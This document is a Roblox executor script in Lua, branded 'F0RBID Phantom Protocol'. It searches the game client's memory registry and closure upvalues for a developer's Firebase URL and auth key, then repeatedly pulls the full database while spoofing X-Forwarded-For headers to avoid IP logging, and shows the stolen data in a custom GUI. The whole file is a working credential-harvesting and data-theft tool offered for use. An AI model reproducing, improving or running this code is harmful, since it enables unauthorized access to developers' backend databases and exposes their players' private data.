-- ========================================================== --
-- 🌑 F0RBID: PHANTOM PROTOCOL (ULTRA-STEALTH EXPOSE)
-- ========================================================== --
print("[F0RBID] ⚡ Phantom Protocol Initialized. Ghosting Identity...")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processedData = {}

local TARGET_URL = nil
local TARGET_AUTH = nil

-- ========================================== --
-- 1. F0RBID GHOST UI (RED ACCENT)
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
if uiParent:FindFirstChild("F0rbidPhantom") then uiParent.F0rbidPhantom:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = "F0rbidPhantom"
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(5, 5, 7)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Corner = Instance.new("UICorner")
Corner.CornerRadius = UDim.new(0, 10)
Corner.Parent = Main

local Glow = Instance.new("Frame")
Glow.Size = UDim2.new(1, 0, 0, 2)
Glow.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
Glow.BorderSizePixel = 0
Glow.Parent = Main

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 5)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[PHANTOM MODE]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 18
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local Status = Instance.new("TextLabel")
Status.Size = UDim2.new(1, -30, 0, 20)
Status.Position = UDim2.new(0, 15, 0, 40)
Status.BackgroundTransparency = 1
Status.Text = "● IDENTITY: F0RBID_OPERATOR (GHOST)"
Status.TextColor3 = Color3.fromRGB(150, 150, 150)
Status.Font = Enum.Font.Code
Status.TextSize = 11
Status.TextXAlignment = Enum.TextXAlignment.Left
Status.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 80)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(path, val)
    local txt = Instance.new("TextLabel")
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.RichText = true
    txt.Text = string.format("<font color='#FF3333'>[%s]</font> %s", path, tostring(val))
    txt.TextColor3 = Color3.fromRGB(220, 220, 220)
    txt.Font = Enum.Font.Code
    txt.TextSize = 12
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 2)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
    Scroll.CanvasPosition = Vector2.new(0, 99999)
end

-- ========================================== --
-- 2. GHOST-SYNC (ANTI-IP LOGGING)
-- ========================================== --
local function DeepExtract(data, path)
    if type(data) ~= "table" then return end
    for k, v in pairs(data) do
        local currentPath = path .. "/" .. tostring(k)
        if type(v) == "table" then
            DeepExtract(v, currentPath)
        else
            local val = tostring(v)
            if #val > 0 and not val:find("firebase") then
                local dataId = currentPath .. val
                if not processedData[dataId] then
                    processedData[dataId] = true
                    AddLog(tostring(k), val)
                end
            end
        end
    end
end

local function StartGhostSync()
    task.spawn(function()
        while task.wait(1.2) do
            if TARGET_URL and TARGET_AUTH then
                pcall(function()
                    local res = request({
                        Url = TARGET_URL .. "/.json?auth=" .. TARGET_AUTH,
                        Method = "GET",
                        Headers = {
                            ["User-Agent"] = "F0RBID-OMNI-PHANTOM",
                            ["X-Forwarded-For"] = string.format("%d.%d.%d.%d", math.random(1,255), math.random(1,255), math.random(1,255), math.random(1,255)),
                            ["Accept-Language"] = "en-US,en;q=0.9",
                            ["Identity-Spoof"] = "F0RBID_ADMIN"
                        }
                    })
                    if res.Success then
                        local decoded = HttpService:JSONDecode(res.Body)
                        if decoded then DeepExtract(decoded, "Root") end
                    end
                end)
            end
        end
    end)
end

-- ========================================== --
-- 3. PASSIVE MEMORY SCANNER (NO HOOKS)
-- ========================================== --
task.spawn(function()
    while not TARGET_URL do
        -- Scan registry for hidden Firebase credentials
        local reg = getreg()
        for _, v in pairs(reg) do
            if type(v) == "table" then
                for k2, v2 in pairs(v) do
                    local ks, vs = tostring(k2), tostring(v2)
                    if vs:find("firebaseio.com") then
                        TARGET_URL = vs:match("(https://[%w%-]+%.firebaseio%.com)")
                    elseif (ks:lower():find("auth") or ks:lower():find("key")) and #vs > 25 then
                        TARGET_AUTH = vs
                    end
                end
            end
        end
        
        -- Passive Upvalue Scan
        if not TARGET_URL then
            for _, f in pairs(getgc()) do
                if type(f) == "function" and islclosure(f) then
                    local ups = getupvalues(f)
                    for _, uv in pairs(ups) do
                        if type(uv) == "string" and uv:find("firebaseio.com") then
                            TARGET_URL = uv:match("(https://[%w%-]+%.firebaseio%.com)")
                        elseif type(uv) == "string" and #uv > 25 and not uv:find("/") then
                            TARGET_AUTH = uv
                        end
                    end
                end
            end
        end

        if TARGET_URL and TARGET_AUTH then
            Status.Text = "● IDENTITY: 🟢 F0RBID_INFILTRATOR (ACTIVE)"
            Status.TextColor3 = Color3.fromRGB(0, 255, 100)
            StartGhostSync()
            break
        end
        task.wait(1.5)
    end
end)
